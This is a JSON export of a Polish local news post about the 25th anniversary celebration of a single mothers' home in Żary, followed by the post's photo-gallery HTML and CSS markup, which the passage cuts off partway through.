{"id":7118,"date":"2017-09-10T13:54:21","date_gmt":"2017-09-10T11:54:21","guid":{"rendered":"http:\/\/moja24.pl\/?p=7118"},"modified":"2019-04-27T02:40:26","modified_gmt":"2019-04-27T00:40:26","slug":"dom-samotnej-matki-pomaga-juz-25-lat-galeria-zdjec","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/09\/10\/dom-samotnej-matki-pomaga-juz-25-lat-galeria-zdjec\/","title":{"rendered":"Dom Samotnej Matki pomaga ju\u017c 25 lat (galeria zdj\u0119\u0107)"},"content":{"rendered":"<p><strong>W sobot\u0119 09 wrze\u015bnia na terenie parafii p.w. Mi\u0142osierdzia Bo\u017cego w \u017barach \u015bwi\u0119towano 25 lecie Domu Samotnej Matki.<\/strong><\/p>\n<p>Plac\u00f3wka istnieje od 1992 roku. Prowadzi j\u0105 od samego pocz\u0105tku Stowarzyszenie Pomocy im. \u015aw. Brata Alberta. W domu Samotnej Matki przebywaj\u0105 kobiety z dzie\u0107mi z ca\u0142ego kraju. Obecnie plac\u00f3wka przygotowana jest dla 15 kobiet, mieszka w niej obecnie 13 potrzebuj\u0105cych mam z dzie\u0107mi.<\/p>\n<p>Jubileusz Domu Samotnej Matki rozpocz\u0105\u0142 si\u0119 Msz\u0105 \u015awi\u0119t\u0105, kt\u00f3r\u0105 odprawi\u0142\u00a0 ks. Mariusz Dudka, \u00a0dyrektor Wydzia\u0142u Duszpasterstwa Rodzin Kurii Diecezjalnej w Zielonej G\u00f3rze. Po mszy s\u0142owo do zebranych wyg\u0142osi\u0142 Biskup Diecezjalny Tadeusz Lity\u0144ski. Po nabo\u017ce\u0144stwie na uczestnik\u00f3w festynu czeka\u0142o mn\u00f3stwo atrakcji. Wyst\u0119py zespo\u0142\u00f3w ludowych, pokazy sport\u00f3w walki, dmuchane zamki i pocz\u0119stunek.<\/p>\n\r\n                <style type=\"text\/css\">\r\n                    \r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item1 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-1-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item2 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-2-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item3 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-3-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item4 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-4-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item5 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-5-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item6 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-6-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item7 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-7-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item8 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-8-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item9 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-9-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item10 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-10-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item11 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-11-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item12 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-12-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item13 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-13-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item14 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-14-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item15 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-15-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item16 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-16-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item17 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-17-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item18 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-18-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item19 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-19-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item20 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-20-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item21 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-21-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item22 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-22-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item23 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-23-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item24 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-24-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item25 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-25-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item26 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-26-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item27 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-27-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item28 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-28-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item29 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-29-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item30 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-30-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item31 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-31-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item32 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-32-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item33 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-33-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item34 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-34-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item35 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-35-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item36 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-36-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item37 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-37-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item38 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-38-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item39 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-39-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item40 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-40-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item41 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-41-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item42 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-42-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item43 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-43-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item44 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-44-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item45 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-45-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item46 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-46-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item47 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-47-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item48 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-48-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item49 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-49-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item50 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-50-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item51 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-51-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item52 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-52-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item53 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-53-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item54 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-54-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item55 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-55-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item56 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-56-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item57 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-57-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item58 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-58-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item59 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-59-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item60 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-60-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item61 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-61-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item62 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-62-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item63 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-63-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item64 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-64-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item65 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-65-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item66 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-66-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f47483e6467  .td-doubleSlider-2 .td-item67 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Issel-Ma\u0142gorzata-Dom-Samotnej-Matki-e1505124432225-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                <\/style>\r\n\r\n                <div id=\"td_uid_1_69f47483e6467\" class=\"td-slide-on-2-columns\">\r\n                    <div class=\"post_td_gallery\">\r\n                        <div class=\"td-gallery-slide-top\">\r\n                           <div class=\"td-gallery-title\">25-lecie Domu Samotnej Matki w \u017barach ( 09 wrze\u015bnia 2017 r. )<\/div>\r\n\r\n                            <div class=\"td-gallery-controls-wrapper\">\r\n                                <div class=\"td-gallery-slide-count\"><span class=\"td-gallery-slide-item-focus\">1<\/span> of 67<\/div>\r\n                                <div class=\"td-gallery-slide-prev-next-but\">\r\n                                    <i class = \"td-icon-left doubleSliderPrevButton\"><\/i>\r\n                                    <i class = \"td-icon-right doubleSliderNextButton\"><\/i>\r\n                                <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-1 \">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-slide-item td-item1\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-1.jpg\" title=\"25 lat Domu Samotnej Matki (1)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-1-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-1-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-1-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-1-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-1-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-1.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item2\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-2.jpg\" title=\"25 lat Domu Samotnej Matki (2)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-2-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-2-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-2-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-2.jpg 638w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item3\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-3.jpg\" title=\"25 lat Domu Samotnej Matki (3)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-3-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-3-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-3-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-3-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-3-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-3.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item4\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-4.jpg\" title=\"25 lat Domu Samotnej Matki (4)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-4-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-4-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-4-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-4.jpg 638w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item5\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-5.jpg\" title=\"25 lat Domu Samotnej Matki (5)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-5-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-5-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-5-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-5-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-5-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-5.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item6\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-6.jpg\" title=\"25 lat Domu Samotnej Matki (6)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-6-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-6-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-6-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-6.jpg 638w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item7\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-7.jpg\" title=\"25 lat Domu Samotnej Matki (7)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-7-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-7-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-7-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-7.jpg 638w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item8\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-8.jpg\" title=\"25 lat Domu Samotnej Matki (8)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-8-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-8-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-8-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-8-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-8-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-8.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item9\">\r\n  